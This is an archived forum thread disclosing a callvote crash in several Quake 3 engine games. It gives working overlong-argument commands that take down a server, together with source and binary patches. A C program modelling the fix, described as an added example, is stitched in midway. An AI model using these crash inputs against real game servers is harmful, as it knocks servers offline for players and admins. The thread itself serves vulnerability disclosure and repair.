Luigi Auriemma

aluigi.org (ARCHIVE-ONLY FORUM!)
 Post subject: crash by callvote q3engine ( jedi academy )
PostPosted: 10 Mar 2010 13:08 

Joined: 17 Feb 2010 17:21
Posts: 3
I recently found a new crash by callvote.
Write it in a .cfg file, e.g. crash.cfg:

Code:
callvote fraglimit 20aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa


And the server crashes with the following message:

********************
Code:
ERROR: Cvar_Update: 319 src 20aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa length exceeds MAX_CVAR_VALUE_STRING
*******************


I can crash a server running any mod, with or without the latest jampgamex86.dll.


 Post subject: Re: crash by callvote q3engine ( jedi academy )
PostPosted: 10 Mar 2010 15:01 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
after some tests:

- vulnerable (all latest versions as of today):
Jedi Academy
Jedi Knight 2
Quake 3
ioquake3
Medal of Honor (crash with more bytes ~700)

- seem not vulnerable:
Call of Duty series
Enemy Territory

the right way to fix this bug would be to patch game\g_cmds.c from:
Code:
   trap_Argv( 1, arg1, sizeof( arg1 ) );
   trap_Argv( 2, arg2, sizeof( arg2 ) );
to
Code:
   trap_Argv( 1, arg1, sizeof( arg1 ) );
   trap_Argv( 2, arg2, 64 );  // must be less than 256
but the problem is that Cmd_CallVote_f is a part of the code not located in the core of the game, so it's not possible to make a universal fix because the code is located in the *game*.dll file or in the vm one (depending on which solution the game adopts; an easy job with the dll).

example of how the compiled code looks in qagamex86.dll:
Code:
:6D6F94BE C7042401000000          mov dword ptr [esp], 00000001
:6D6F94C5 B800040000              mov eax, 00000400             ; sizeof( arg1 )
:6D6F94CA 8DBDE8FBFFFF            lea edi, dword ptr [ebp+FFFFFBE8]
:6D6F94D0 89442408                mov dword ptr [esp+08], eax
:6D6F94D4 BE00040000              mov esi, 00000400             ; sizeof( arg2 ) (set it to 0000003F!)
:6D6F94D9 897C2404                mov dword ptr [esp+04], edi
:6D6F94DD E83E810100              call 6D711620                 ; trap_Argv
:6D6F94E2 89742408                mov dword ptr [esp+08], esi
:6D6F94E6 8D8DE8F7FFFF            lea ecx, dword ptr [ebp+FFFFF7E8]
:6D6F94EC 894C2404                mov dword ptr [esp+04], ecx
:6D6F94F0 C7042402000000          mov dword ptr [esp], 00000002 ; 2
:6D6F94F7 E824810100              call 6D711620                 ; trap_Argv
and an example from jampgame.dll (remember that the one in the pk3 files must be updated too):
Code:
:2007DA2B 6800040000              push 00000400
:2007DA30 8D54240C                lea edx, dword ptr [esp+0C]
:2007DA34 52                      push edx
:2007DA35 6A01                    push 00000001
:2007DA37 E834850200              call 200A5F70
:2007DA3C 6800040000              push 00000400  ; fix this one
:2007DA41 8D842418040000          lea eax, dword ptr [esp+00000418]
:2007DA48 50                      push eax
:2007DA49 6A02                    push 00000002
:2007DA4B E820850200              call 200A5F70

so an alternative solution would be to remove the shutdown of the server caused by the following instructions in qcommon\cvar.c:
Code:
   if ( strlen(cv->string)+1 > MAX_CVAR_VALUE_STRING )
     Com_Error( ERR_DROP, "Cvar_Update: src %s length %zd exceeds MAX_CVAR_VALUE_STRING",
           cv->string,
           strlen(cv->string));
   Q_strncpyz( vmCvar->string, cv->string,  MAX_CVAR_VALUE_STRING );
the quake 3 engine uses the safe Q_strncpyz function so there is absolutely no problem in removing Com_Error.
but there is a little problem when the server (or the match) restarts, because some games like JKA crash while building the init string containing the long cvar, while in others this string could end up truncated.
so the admin should force the resetting of these cvars in some way.

obviously the best "fix" is to disable callvote, as I have always suggested


 Post subject: Re: crash by callvote q3engine ( jedi academy )
PostPosted: 10 Mar 2010 19:25 

Joined: 17 Feb 2010 17:21
Posts: 3
In q_shared.h I changed:

Code:
#define   MAX_STRING_TOKENS   1024   // max tokens resulting from Cmd_TokenizeString


To:

Code:
#define   MAX_STRING_TOKENS   75   // max tokens resulting from Cmd_TokenizeString


And now I can't crash it.


 Post subject: Re: crash by callvote q3engine ( jedi academy )
PostPosted: 10 Mar 2010 20:49 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
uhmm, modifying that define is not such a good change because it's also used in other things.
you can have the same effect (exactly like the second fix I proposed) by modifying:
Code:
void Cmd_CallVote_f( gentity_t *ent ) {
   char*   c;
   int      i;
   char   arg1[MAX_STRING_TOKENS];
   char   arg2[MAX_STRING_TOKENS];
to
Code:
void Cmd_CallVote_f( gentity_t *ent ) {
   char*   c;
   int      i;
   char   arg1[MAX_STRING_TOKENS];
   char   arg2[75];


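The two fixes proposed above (reading arg2 with a 64-byte bound, or declaring it as arg2[75]) work for one reason: trap_Argv copies with Q_strncpyz semantics, so the buffer size caps the length of the value that later reaches the Cvar_Update check. The following C program is an added example, not code from this thread or from the Quake 3 engine. It reimplements Q_strncpyz and a stand-in for trap_Argv as hypothetical helpers, assumes the stock q_shared.h values MAX_STRING_TOKENS = 1024 and MAX_CVAR_VALUE_STRING = 256, and reports which second-argument lengths would survive the check for a given arg2 bound:

```c
#include <stdio.h>
#include <string.h>

/* Stock values from the engine's q_shared.h, assumed unchanged here.
 * ARG2_FIXED_SIZE is the bound proposed in the thread. */
#define MAX_STRING_TOKENS      1024
#define MAX_CVAR_VALUE_STRING  256
#define ARG2_FIXED_SIZE        64

/* Q_strncpyz semantics, reimplemented (hypothetical helper): copy at most
 * destsize-1 bytes and always NUL-terminate. */
static void q_strncpyz(char *dest, const char *src, size_t destsize) {
    if (destsize == 0) return;
    strncpy(dest, src, destsize - 1);
    dest[destsize - 1] = '\0';
}

/* Stand-in for trap_Argv(n, buf, bufsize): the game module receives the n-th
 * token truncated to bufsize. Here the token is passed in directly. */
static void fake_trap_argv(const char *token, char *buf, size_t bufsize) {
    q_strncpyz(buf, token, bufsize);
}

/* The condition Cvar_Update tests before Com_Error(ERR_DROP, ...):
 * returns 1 if the value fits the vmCvar string, 0 if the server would drop. */
int cvar_value_fits(const char *value) {
    return strlen(value) + 1 <= MAX_CVAR_VALUE_STRING;
}

/* Models Cmd_CallVote_f reading its second argument into a local buffer of
 * arg2size bytes; returns the length of the value that would be written into
 * the voted cvar and reach Cvar_Update. */
size_t callvote_arg2_len(const char *token, size_t arg2size) {
    char arg2[MAX_STRING_TOKENS];          /* declared size in g_cmds.c */
    if (arg2size > sizeof(arg2)) arg2size = sizeof(arg2);
    fake_trap_argv(token, arg2, arg2size);
    return strlen(arg2);
}

/* Returns 1 if a second argument of token_len bytes passes Cvar_Update when
 * arg2 is read with the given bound, 0 if it would trigger the ERR_DROP. */
int vote_survives(size_t token_len, size_t arg2size) {
    char token[MAX_STRING_TOKENS];
    char arg2[MAX_STRING_TOKENS];
    if (token_len >= sizeof(token)) token_len = sizeof(token) - 1;
    memset(token, 'a', token_len);          /* constructed input: a run of 'a' */
    token[token_len] = '\0';
    if (arg2size > sizeof(arg2)) arg2size = sizeof(arg2);
    fake_trap_argv(token, arg2, arg2size);
    return cvar_value_fits(arg2);
}

int main(void) {
    const size_t lens[]   = { 20, 255, 256, 300, 700 };
    const size_t bounds[] = { MAX_STRING_TOKENS, 75, ARG2_FIXED_SIZE };
    size_t i, j;

    printf("%-10s", "arg2 len");
    for (j = 0; j < sizeof(bounds) / sizeof(bounds[0]); j++)
        printf(" bound=%-5zu", bounds[j]);
    printf("\n");
    for (i = 0; i < sizeof(lens) / sizeof(lens[0]); i++) {
        printf("%-10zu", lens[i]);
        for (j = 0; j < sizeof(bounds) / sizeof(bounds[0]); j++)
            printf(" %-11s", vote_survives(lens[i], bounds[j]) ? "ok" : "ERR_DROP");
        printf("\n");
    }
    return 0;
}
```

With the stock `sizeof( arg2 )` bound of 1024, any second argument of 256 or more characters reaches Cvar_Update and drops the server; with a 64- or 75-byte bound the copied value can never exceed the limit, whatever the client sends, which is why shrinking only the local buffer (and not MAX_STRING_TOKENS) is sufficient.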
 Post subject: Re: crash by callvote q3engine ( jedi academy )
PostPosted: 11 Mar 2010 02:18 

Joined: 05 Oct 2007 01:20
Posts: 402
Location: Florida
u limited it to 75?!?!?
noooooooo never lol. 75 is nothing!
if anything limit it to like 1000 or 900, geez.
and this isn't really new, u can do it on other commands
it's msgboom/msgbof on another cmd, that's not really new, others have tried my friend :)
also I don't really consider this a real 'crash' because voting has to be enabled and in like 85% of the servers voting is not enabled
it's like trying to find a non-VAC server, they're there but probably no one is in them, they're full of bots, they're laggy or they just suck.


 Post subject: Re: crash by callvote q3engine ( jedi academy )
PostPosted: 11 Mar 2010 08:21 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
this problem and msgboom are two different things, and on the internet there was no reference to this problem although it's so basic that anyone has tried it at least once in his life (me included; probably I tested it with CoD, which is why I had no results... mystery).
instead it's good to limit the size of arg2 (NOT the size of MAX_STRING_TOKENS)


 Post subject: Re: crash by callvote q3engine ( jedi academy )
PostPosted: 11 Mar 2010 12:11 

Joined: 17 Feb 2010 17:21
Posts: 3
evan1715 wrote:
u limited it to 75?!?!?
noooooooo never lol. 75 is nothing!
if anything limit it to like 1000 or 900, geez.
and this isn't really new, u can do it on other commands
it's msgboom/msgbof on another cmd, that's not really new, others have tried my friend :)
also I don't really consider this a real 'crash' because voting has to be enabled and in like 85% of the servers voting is not enabled
it's like trying to find a non-VAC server, they're there but probably no one is in them, they're full of bots, they're laggy or they just suck.


75? It's enough.

Code:
/callvote fraglimit 1000000000000000000000000000000000000000000000000000000000000000000000000


And yes, it's a crash. On JKA, 50% of servers have voting enabled and 50% have it disabled, because a "hacker" can take the rcon with the callvote flaw.


 Post subject: Re: crash by callvote q3engine ( jedi academy )
PostPosted: 12 Mar 2010 02:42 

Joined: 05 Oct 2007 01:20
Posts: 402
Location: Florida
75 is for ur personal use but for client and server stuff it isn't...
the crash thing was more of an opinion ("I don't really consider" is an opinion statement)
and my percentages were right based upon jk3 1.0 and all jk2 versions because I don't like/play jk3 1.01


 Post subject: Re: crash by callvote q3engine ( jedi academy )
PostPosted: 12 Mar 2010 07:55 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
75 in arg2 is considered the max length of the second argument, so:
callvote map aaaaa_75_aaaa
callvote kick aaaaa_75_aaaa

and considering the normal/max length of maps and nicknames it seems more than enough

